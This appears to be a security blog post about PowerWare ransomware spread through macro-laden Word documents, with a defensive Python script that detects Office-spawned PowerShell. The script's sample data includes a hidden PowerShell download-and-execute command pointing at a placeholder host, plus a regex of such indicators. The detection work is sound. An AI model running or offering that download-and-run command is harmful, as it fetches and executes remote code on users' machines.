PowerWare – new technique acquired by malware writers to infect your PCs


Recently we became aware of multiple malware families that use PowerShell scripts combined with other, more traditional components to infect a victim's PC. Earlier this month, security researchers at Palo Alto Networks published an analysis of one such ransomware strain. The malware is distributed as an MS Word attachment to e-mail; the malicious document contains macros that run a PowerShell script.

The PowerShell script analyzes the system environment and tries to detect whether it is running in a virtual machine or a sandbox. The malware also appears to actively avoid healthcare and education machines, while targeting point-of-sale systems and machines that conduct financial transactions. Similar techniques were seen in the ‘Ursnif’ malware family in 2015.

A new strain of ransomware, PowerWare, was spotted by researchers from Carbon Black. As in the previous case, the PowerShell script is delivered via a macro-enabled Microsoft Word document. The document's macros execute cmd.exe, which in turn launches PowerShell with options that download and run the malicious PowerWare code.
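The chain described above (Word document → macro → cmd.exe → PowerShell that downloads and runs code) leaves a distinctive trail in process-creation telemetry, and that is where a defender can catch it regardless of which ransomware payload is on the other end. The following detection logic is an added example written for this page, not code from Carbon Black, Palo Alto Networks or the PowerWare sample itself. It assumes a simplified record schema (`pid`, `ppid`, `image`, `cmdline`, roughly what Sysmon Event ID 1 or Security event 4688 carries), and the sample events and the download-and-run indicator list are constructed for illustration; it walks each PowerShell process back up its parent chain and flags those that descend from an Office application, rating the finding higher when the command line also shows download-and-execute options.

```python
"""Flag PowerShell processes spawned (directly or via cmd.exe) from an Office
application, as in the macro -> cmd.exe -> PowerShell chain described above.
Added example with a hypothetical event schema; sample data is constructed."""
import re
from typing import Dict, List

# Constructed sample of process-creation records. Field names mirror what a
# typical process-creation event source carries, but the schema is assumed.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n "C:\\Users\\u\\Downloads\\invoice.doc"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c powershell -nop -w hidden -c "..."'},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/p.ps1')\""},
    # Benign administrative PowerShell launched from the desktop, not from Office.
    {"pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Command-line indicators of "download and run" behaviour and of attempts to
# hide the console. The list is illustrative, not exhaustive.
DOWNLOAD_RUN = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|invoke-webrequest"
    r"|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, by_pid: Dict[int, Dict]) -> List[str]:
    """Walk parent links from pid upward; returns image names, child first.
    Stops at an unknown parent or on a cycle (pid reuse can produce loops)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        event = by_pid[pid]
        chain.append(basename(event["image"]))
        pid = event["ppid"]
    return chain


def find_office_powershell_chains(events: List[Dict]) -> List[Dict]:
    """Return one finding per powershell.exe whose ancestors include an Office app."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        if basename(event["image"]) != "powershell.exe":
            continue
        chain = ancestry(event["pid"], by_pid)
        office_parents = [p for p in chain[1:] if p in OFFICE_APPS]
        if not office_parents:
            continue
        indicators = sorted({m.group(0).lower()
                             for m in DOWNLOAD_RUN.finditer(event["cmdline"])})
        findings.append({
            "pid": event["pid"],
            "chain": " <- ".join(chain),
            "office_parent": office_parents[0],
            "via_cmd": "cmd.exe" in chain[1:],
            "indicators": indicators,
            # Office -> PowerShell alone is suspicious; with download/run
            # options on the command line it is a high-confidence hit.
            "severity": "high" if indicators else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_office_powershell_chains(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed sample, the script reports exactly one finding: PID 400, chain `powershell.exe <- cmd.exe <- winword.exe <- explorer.exe`, launched via cmd.exe, with the `-nop`, `-w hidden`, `iex` and `downloadstring` indicators and severity `high`; the administrative PowerShell process (PID 500) is not reported because no Office application is in its ancestry. Feeding real telemetry in requires only mapping the event source's field names onto the four keys the functions expect.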

Victims are told to pay a $500 ransom to regain access to their PC. If it is not paid within two weeks, the amount rises to $1000.

We would like to warn users not to open documents received from untrusted sources, to configure Microsoft Office security settings to disable macros, and to keep their software up to date.
